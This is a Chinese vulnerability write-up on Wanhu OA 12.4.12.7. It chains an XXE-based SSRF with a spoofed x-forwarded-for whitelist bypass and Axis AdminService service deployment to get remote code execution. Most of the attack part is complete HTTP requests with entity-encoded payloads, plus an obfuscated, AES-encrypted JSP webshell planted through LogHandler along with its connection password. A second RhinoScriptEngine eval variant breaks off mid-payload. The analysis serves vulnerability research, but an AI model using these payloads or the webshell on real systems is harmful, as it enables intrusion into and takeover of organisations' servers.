万户OA GeneralWeb SSRF组合RCE

发表于 更新于 分类于 阅读次数: 评论数:

环境

万户 oa 12.4.12.7

XXE漏洞点

com.whir.service.common.CallApigetResult方法中,传入input参数调用XXESAXBuilder.build对输入字符串解析,未配置安全策略,可构造特殊的xml语句实现XXE漏洞利用。

image-20240518225348724

com.whir.service.webservice.GeneralWebOAManager方法中,调用了CallApi#getResult方法。

image-20240518225820300

该方法在META-INF/xfire/services.xml中定义,作为xfire框架的一个WebService服务。

image-20240518225945694

web.xml配置,可通过/xfservices/GeneralWeb进行调用。

image-20240518230117122
image-20240518230225429

权限绕过

web.xml中,配置了Filter,所有的请求都会经过com.whir.common.util.SetCharacterEncodingFilter#doFilter方法

image-20240518230701770

159行,请求路径中存在/xfservices/GeneralWeb,则会调用this.judgeIsSecurityIP((HttpServletRequest)request)方法,判断请求的ip是否为白名单中的ip,如果请求ip不在白名单中则return null

image-20240518230931119

judgeIsSecurityIP方法中,通过IPUtil.getIpAddr(request)获取ip

image-20240518231101971

getIpAddr方法中Header头中获取ip,可通过指定x-forwarded-forProxy-Client-IPWL-Proxy-Client-IP指定ip。

image-20240518231116723

获取到IP后会判断是否在localhost192.168.0192.168.7中,在就会执行chain.doFilter

image-20240518231401799

在请求头中指定x-forwarded-for: localhost,回显了Invalid SOAP request,说明执行到GeneralWeb

image-20240518231705615

dnslog

1
2
3
4
5
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE aaa [
<!ENTITY name SYSTEM "http://dnslog.cn" >
]>
<name>&name;</name>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /defaultroot/xfservices/GeneralWeb HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONIDOA=D7AA7CDC820C702A5A45F51AAB4B677A; LocLan=zh_CN; ezofficeDomainAccount=whir; empLivingPhoto=; ezofficeUserPortal=; ezofficePortal3=1; OASESSIONID=509378B8F4156297A82C8899060A9FBE; ezofficeUserName=admin; ezofficePortal0=; SESSIONIDOA=05A06A3BF1E3D38195AB69663E791C25
x-forwarded-for: localhost
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 172.20.10.132:7001
Content-Length: 323

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
   <soapenv:Header/>
   <soapenv:Body>
      <gen:OAManager>
         <!--type: string-->
   <gen:input>&#x3c;&#x3f;&#x78;&#x6d;&#x6c;&#x20;&#x76;&#x65;&#x72;&#x73;&#x69;&#x6f;&#x6e;&#x3d;&#x22;&#x31;&#x2e;&#x30;&#x22;&#x20;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x69;&#x6e;&#x67;&#x3d;&#x22;&#x75;&#x74;&#x66;&#x2d;&#x38;&#x22;&#x3f;&#x3e;&#x0a;&#x3c;&#x21;&#x44;&#x4f;&#x43;&#x54;&#x59;&#x50;&#x45;&#x20;&#x61;&#x61;&#x61;&#x20;&#x5b;&#x0a;&#x3c;&#x21;&#x45;&#x4e;&#x54;&#x49;&#x54;&#x59;&#x20;&#x6e;&#x61;&#x6d;&#x65;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4d;&#x20;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3a;&#x2f;&#x2f;&#x67;&#x71;&#x6f;&#x38;&#x71;&#x68;&#x2e;&#x64;&#x6e;&#x73;&#x6c;&#x6f;&#x67;&#x2e;&#x63;&#x6e;&#x22;&#x20;&#x3e;&#x0a;&#x5d;&#x3e;&#x0a;&#x3c;&#x6e;&#x61;&#x6d;&#x65;&#x3e;&#x26;&#x6e;&#x61;&#x6d;&#x65;&#x3b;&#x3c;&#x2f;&#x6e;&#x61;&#x6d;&#x65;&#x3e;</gen:input>
      </gen:OAManager>
   </soapenv:Body>
</soapenv:Envelope>
image-20240518232054144

内网 Axis AdminService 服务漏洞

web.xml中配置了AxisServletAxis在低版本可通过AdminService服务更新配置文件,添加服务。

image-20240518233334689

server-config.wsdd中配置了AdminService服务,访问方式为/services/AdminService,但是enableRemoteAdminfalse,意味着只能本地访问,正好可以配合如上SSRF漏洞实现修改配置文件添加恶意服务。

image-20240518233041468

漏洞分析

在处理AxisServlet的过程中

1
2
3
org.apache.axis.transport.http.AxisServlet#doGet
    org.apache.axis.transport.http.AxisServlet#processQuery
    	org.apache.axis.transport.http.QSMethodHandler#invoke

QSMethodHandlerinvoke方法会从request对象中获取method参数,然后调用this.invokeEndpointFromGet方法。

image-20240519114250384

method参数拼接到SOAP报文中。

1
2
3
4
5
6
7
8
9
10
11
12
13
private void invokeEndpointFromGet(MessageContext msgContext, HttpServletResponse response, PrintWriter writer, String method, String args) throws AxisFault {
        String body = "<" + method + ">" + args + "</" + method + ">";
        String msgtxt = "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"><SOAP-ENV:Body>" + body + "</SOAP-ENV:Body>" + "</SOAP-ENV:Envelope>";
        ByteArrayInputStream istream = new ByteArrayInputStream(msgtxt.getBytes());
        Message responseMsg = null;

        try {
            AxisServer engine = (AxisServer)msgContext.getProperty("transport.http.plugin.engine");
            Message msg = new Message(istream, false);
            msgContext.setRequestMessage(msg);
            engine.invoke(msgContext);
            ...
}
image-20240519114914766

调用栈

1
2
3
4
5
6
7
8
9
org.apache.axis.transport.http.AxisServlet#doGet
    org.apache.axis.transport.http.AxisServlet#processQuery
    	org.apache.axis.transport.http.QSMethodHandler#invoke
    		org.apache.axis.transport.http.QSMethodHandler#invokeEndpointFromGet
    			org.apache.axis.server.AxisServer#invoke
    				org.apache.axis.handlers.soap.SOAPService#invoke
    					org.apache.axis.providers.java.JavaProvider#invoke
    					org.apache.axis.providers.java.MsgProvider#processMessage
    					org.apache.axis.utils.Admin#AdminService
image-20240519110926623
image-20240519110946012

获取AdminServiceenableRemoteAdmin配置,为false,则获取源ip是否为127.0.0.1,如果不是,则获取本地ip与源ip进行对比,不一致则报异常。

image-20240519111633692

processWSDD方法中,将root作为参数创建WSDDDocument对象,再获取((WSDDEngineConfiguration)config).getDeployment()原来的配置,最后调用deploy执行部署。

image-20240519112719061

漏洞利用

org.apache.axis.handlers.LogHandler(文件写入)

1
org.apache.axis.handlers.LogHandler

ssrf 添加恶意服务 payload

1
2
3
4
5
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE aaa [
<!ENTITY name SYSTEM "http://127.0.0.1:7001/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22randomBBB%22%20provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler%20type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%20%3E%3Cparameter%20name%3D%22LogHandler.fileName%22%20value%3D%22..%2Fserver%2Foa%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2Fshell.jsp%22%20%2F%3E%3Cparameter%20name%3D%22LogHandler.writeToConsole%22%20value%3D%22false%22%20%2F%3E%3C%2Fhandler%3E%3C%2FrequestFlow%3E%3Cparameter%20name%3D%22className%22%20value%3D%22java.util.Random%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%20%2F%3E%3C%2Fservice%3E%3C%2Fdeployment" >
]>
<name>&name;</name>

通过GeneralWeb接口触发SSRF 添加服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONIDOA=CE51E9EFA8D671515820825DDE46CE04; LocLan=zh_CN; ezofficeDomainAccount=whir; empLivingPhoto=; ezofficeUserPortal=; ezofficePortal3=1; OASESSIONID=509378B8F4156297A82C8899060A9FBE; ezofficeUserName=admin; ezofficePortal0=; SESSIONIDOA=6E31EDD176A235E4A50A1E32A72D2672
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 172.20.10.132:7001
Content-Length: 5932

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
   <soapenv:Header/>
   <soapenv:Body>
      <gen:OAManager>
<gen:input>&#x3c;&#x3f;&#x78;&#x6d;&#x6c;&#x20;&#x76;&#x65;&#x72;&#x73;&#x69;&#x6f;&#x6e;&#x3d;&#x22;&#x31;&#x2e;&#x30;&#x22;&#x20;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x69;&#x6e;&#x67;&#x3d;&#x22;&#x75;&#x74;&#x66;&#x2d;&#x38;&#x22;&#x3f;&#x3e;&#x0a;&#x3c;&#x21;&#x44;&#x4f;&#x43;&#x54;&#x59;&#x50;&#x45;&#x20;&#x61;&#x61;&#x61;&#x20;&#x5b;&#x0a;&#x3c;&#x21;&#x45;&#x4e;&#x54;&#x49;&#x54;&#x59;&#x20;&#x6e;&#x61;&#x6d;&#x65;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4d;&#x20;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3a;&#x2f;&#x2f;&#x31;&#x32;&#x37;&#x2e;&#x30;&#x2e;&#x30;&#x2e;&#x31;&#x3a;&#x37;&#x30;&#x30;&#x31;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x72;&#x6f;&#x6f;&#x74;&#x2f;&#x73;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x73;&#x2f;&#x2e;&#x2f;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x53;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x3f;&#x6d;&#x65;&#x74;&#x68;&#x6f;&#x64;&#x3d;&#x21;&#x2d;&#x2d;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x64;&#x65;&#x70;&#x6c;&#x6f;&#x79;&#x6d;&#x65;&#x6e;&#x74;&#x25;&#x32;&#x30;&#x78;&#x6d;&#x6c;&#x6e;&#x73;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x68;&#x74;&#x74;&#x70;&#x25;&#x33;&#x41;&#x25;&#x32;&#x46;&#x25;&#x32;&#x46;&#x78;&#x6d;&#x6c;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x6f;&#x72;&#x67;&#x25;&#x32;&#x46;&#x61;&#x78;&#x69;&#x73;&#x25;&#x32;&#x46;&#x77;&#x73;&#x64;&#x64;&#x25;&#x32;&#x46;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x78;&#x6d;&#x6c;&#x6e;&#x73;&#x25;&#x33;&#x41;&#x6a;&#x61;&#x76;&#x61;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x68;&#x74;&#x74;&#x70;&#x25;&#x33;&#x41;&#x25;&#x32;&#x46;&#x25;&#x32;&#x46;&#x78;&#x6d;&#x6c;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x6f;&#x72;&#x67;&#x25;&#x32;&#x46;&#x61;&#x78;&#x69;&#x73;&#x25;&#x32;&#x46;&#x77;&#x73;&#x64;&#x64;&#x25;&#x32;&#x46;&#x70;&#x72;&#x6f;&#x76;&#x69;&#x64;&#x65;&#x72;&#x73;&#x25;&#x32;&#x46;&#x6a;&#x61;&#x76;&#x61;&#x25;&#x32;&#x32;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x73;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x25;&#x32;&#x30;&#x6e;&#x61;&#x6d;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x72;&#x61;&#x6e;&#x64;&#x6f;&#x6d;&#x42;&#x42;&#x42;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x70;&#x72;&#x6f;&#x76;&#x69;&#x64;&#x65;&#x72;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x6a;&#x61;&#x76;&#x61;&#x25;&#x33;&#x41;&#x52;&#x50;&#x43;&#x25;&#x32;&#x32;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x72;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x46;&#x6c;&#x6f;&#x77;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x68;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x25;&#x32;&#x30;&#x74;&#x79;&#x70;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x6a;&#x61;&#x76;&#x61;&#x25;&#x33;&#x41;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x61;&#x78;&#x69;&#x73;&#x2e;&#x68;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x73;&#x2e;&#x4c;&#x6f;&#x67;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x70;&#x61;&#x72;&#x61;&#x6d;&#x65;&#x74;&#x65;&#x72;&#x25;&#x32;&#x30;&#x6e;&#x61;&#x6d;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x4c;&#x6f;&#x67;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x2e;&#x66;&#x69;&#x6c;&#x65;&#x4e;&#x61;&#x6d;&#x65;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x76;&#x61;&#x6c;&#x75;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x2e;&#x2e;&#x25;&#x32;&#x46;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x25;&#x32;&#x46;&#x6f;&#x61;&#x25;&#x32;&#x46;&#x64;&#x65;&#x70;&#x6c;&#x6f;&#x79;&#x25;&#x32;&#x46;&#x6a;&#x62;&#x6f;&#x73;&#x73;&#x2d;&#x77;&#x65;&#x62;&#x2e;&#x64;&#x65;&#x70;&#x6c;&#x6f;&#x79;&#x65;&#x72;&#x25;&#x32;&#x46;&#x52;&#x4f;&#x4f;&#x54;&#x2e;&#x77;&#x61;&#x72;&#x25;&#x32;&#x46;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x2e;&#x6a;&#x73;&#x70;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x25;&#x32;&#x46;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x70;&#x61;&#x72;&#x61;&#x6d;&#x65;&#x74;&#x65;&#x72;&#x25;&#x32;&#x30;&#x6e;&#x61;&#x6d;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x4c;&#x6f;&#x67;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x2e;&#x77;&#x72;&#x69;&#x74;&#x65;&#x54;&#x6f;&#x43;&#x6f;&#x6e;&#x73;&#x6f;&#x6c;&#x65;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x76;&#x61;&#x6c;&#x75;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x25;&#x32;&#x46;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x68;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x72;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x46;&#x6c;&#x6f;&#x77;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x70;&#x61;&#x72;&#x61;&#x6d;&#x65;&#x74;&#x65;&#x72;&#x25;&#x32;&#x30;&#x6e;&#x61;&#x6d;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x4e;&#x61;&#x6d;&#x65;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x76;&#x61;&#x6c;&#x75;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x52;&#x61;&#x6e;&#x64;&#x6f;&#x6d;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x25;&#x32;&#x46;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x70;&#x61;&#x72;&#x61;&#x6d;&#x65;&#x74;&#x65;&#x72;&#x25;&#x32;&#x30;&#x6e;&#x61;&#x6d;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x61;&#x6c;&#x6c;&#x6f;&#x77;&#x65;&#x64;&#x4d;&#x65;&#x74;&#x68;&#x6f;&#x64;&#x73;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x76;&#x61;&#x6c;&#x75;&#x65;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x2a;&#x25;&#x32;&#x32;&#x25;&#x32;&#x30;&#x25;&#x32;&#x46;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x64;&#x65;&#x70;&#x6c;&#x6f;&#x79;&#x6d;&#x65;&#x6e;&#x74;&#x22;&#x20;&#x3e;&#x0a;&#x5d;&#x3e;&#x0a;&#x3c;&#x6e;&#x61;&#x6d;&#x65;&#x3e;&#x26;&#x6e;&#x61;&#x6d;&#x65;&#x3b;&#x3c;&#x2f;&#x6e;&#x61;&#x6d;&#x65;&#x3e;</gen:input>
      </gen:OAManager>
   </soapenv:Body>
</soapenv:Envelope>
image-20240519134116902

调用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
POST /defaultroot/services/./randomBBB HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONIDOA=D7AA7CDC820C702A5A45F51AAB4B677A; LocLan=zh_CN; ezofficeDomainAccount=whir; empLivingPhoto=; ezofficeUserPortal=; ezofficePortal3=1; OASESSIONID=509378B8F4156297A82C8899060A9FBE; ezofficeUserName=admin; ezofficePortal0=; SESSIONIDOA=05A06A3BF1E3D38195AB69663E791C25
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 172.20.10.132:7001
Content-Length: 3377

<?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Body>
        <api:main
        soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
            <api:in0><![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!\u0063\u006c\u0061\u0073\u0073\u0020\u0055\u0020\u0065\u0078\u0074\u0065\u006e\u0064\u0073\u0020\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u007b\u0055\u0028\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0020\u0063\u0029\u007b\u0073\u0075\u0070\u0065\u0072\u0028\u0063\u0029\u003b\u007d\u0070\u0075\u0062\u006c\u0069\u0063\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0067\u0028\u0062\u0079\u0074\u0065\u0020\u005b\u005d\u0062\u0029\u007b\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0073\u0075\u0070\u0065\u0072\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u002c\u0030\u002c\u0062\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u003b\u007d\u007d%>
<%\u0069\u0066\u0020\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0029\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0022\u0050\u004f\u0053\u0054\u0022\u0029\u0029\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u006b\u003d\u0022\u0034\u0032\u0037\u0062\u0038\u0032\u0035\u0039\u0037\u0031\u0030\u0061\u0065\u0064\u0030\u0039\u0022\u003b\u0073\u0065\u0073\u0073\u0069\u006f\u006e\u002e\u0070\u0075\u0074\u0056\u0061\u006c\u0075\u0065\u0028\u0022\u0075\u0022\u002c\u006b\u0029\u003b\u0043\u0069\u0070\u0068\u0065\u0072\u0020\u0063\u003d\u0043\u0069\u0070\u0068\u0065\u0072\u002e\u0067\u0065\u0074\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0022\u0041\u0045\u0053\u0022\u0029\u003b\u0063\u002e\u0069\u006e\u0069\u0074\u0028\u0032\u002c\u006e\u0065\u0077\u0020\u0053\u0065\u0063\u0072\u0065\u0074\u004b\u0065\u0079\u0053\u0070\u0065\u0063\u0028\u006b\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u002c\u0022\u0041\u0045\u0053\u0022\u0029\u0029\u003b\u006e\u0065\u0077\u0020\u0055\u0028\u0074\u0068\u0069\u0073\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0028\u0029\u0029\u002e\u0067\u0028\u0063\u002e\u0064\u006f\u0046\u0069\u006e\u0061\u006c\u0028\u006e\u0065\u0077\u0020\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0042\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u0029\u002e\u0072\u0065\u0061\u0064\u004c\u0069\u006e\u0065\u0028\u0029\u0029\u0029\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0070\u0061\u0067\u0065\u0043\u006f\u006e\u0074\u0065\u0078\u0074\u0029\u003b\u007d%>
]]>
            </api:in0>
        </api:main>
  </soapenv:Body>
</soapenv:Envelope>
image-20240519134152457

连接 http://172.20.10.132:7001/shell.jsp ndrqjxdtldybh

image-20240519134236711

com.sun.script.javascript.RhinoScriptEngine(代码执行)

1
com.sun.script.javascript.RhinoScriptEngine

ssrf 触发代码执行 payload

1
2
3
4
5
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE aaa [
<!ENTITY name SYSTEM "http://127.0.0.1:7001/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment" >
]>
<name>&name;</name>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONIDOA=CE51E9EFA8D671515820825DDE46CE04; LocLan=zh_CN; ezofficeDomainAccount=whir; empLivingPhoto=; ezofficeUserPortal=; ezofficePortal3=1; OASESSIONID=509378B8F4156297A82C8899060A9FBE; ezofficeUserName=admin; ezofficePortal0=; SESSIONIDOA=6E31EDD176A235E4A50A1E32A72D2672
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 172.20.10.132:7001
Content-Length: 6208

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
   <soapenv:Header/>
   <soapenv:Body>
      <gen:OAManager>
         <!--type: string-->
         <gen:input>&#x3c;&#x3f;&#x78;&#x6d;&#x6c;&#x20;&#x76;&#x65;&#x72;&#x73;&#x69;&#x6f;&#x6e;&#x3d;&#x22;&#x31;&#x2e;&#x30;&#x22;&#x20;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x69;&#x6e;&#x67;&#x3d;&#x22;&#x75;&#x74;&#x66;&#x2d;&#x38;&#x22;&#x3f;&#x3e;&#x0a;&#x3c;&#x21;&#x44;&#x4f;&#x43;&#x54;&#x59;&#x50;&#x45;&#x20;&#x61;&#x61;&#x61;&#x20;&#x5b;&#x0a;&#x3c;&#x21;&#x45;&#x4e;&#x54;&#x49;&#x54;&#x59;&#x20;&#x6e;&#x61;&#x6d;&#x65;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4d;&#x20;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3a;&#x2f;&#x2f;&#x31;&#x32;&#x37;&#x2e;&#x30;&#x2e;&#x30;&#x2e;&#x31;&#x3a;&#x37;&#x30;&#x30;&#x31;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x72;&#x6f;&#x6f;&#x74;&#x2f;&#x73;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x73;&#x2f;&#x2e;&#x2f;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x53;&#x65;&#x72;&#x76;&#x69;&#x63;&#x65;&#x3f;&#x6d;&#x65;&#x74;&#x68;&#x6f;&#x64;&#x3d;&#x21;&#x2d;&#x2d;&#x25;&#x33;&#x45;&#x25;&#x33;&#x43;&#x64;&#x65;&#x70;&#x6c;&#x6f;&#x79;&#x6d;&#x65;&#x6e;&#x74;&#x25;&#x32;&#x30;&#x78;&#x6d;&#x6c;&#x6e;&#x73;&#x25;&#x33;&#x44;&#x25;&#x32;&#x32;&#x68;&#x74;&#x74;&#x70;&#x25;&#x33;&#x41;&#x25;&#x32;&#x46;&#x25;&#x32;&#x46;&#x78;&#x6d;&#x6c;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x6f;&#x72;&#x67;&#x25;&#x32;&#x46;&#x61;&#x78;&#x69;&#x73;&#x25;&#x32;&#x46;&#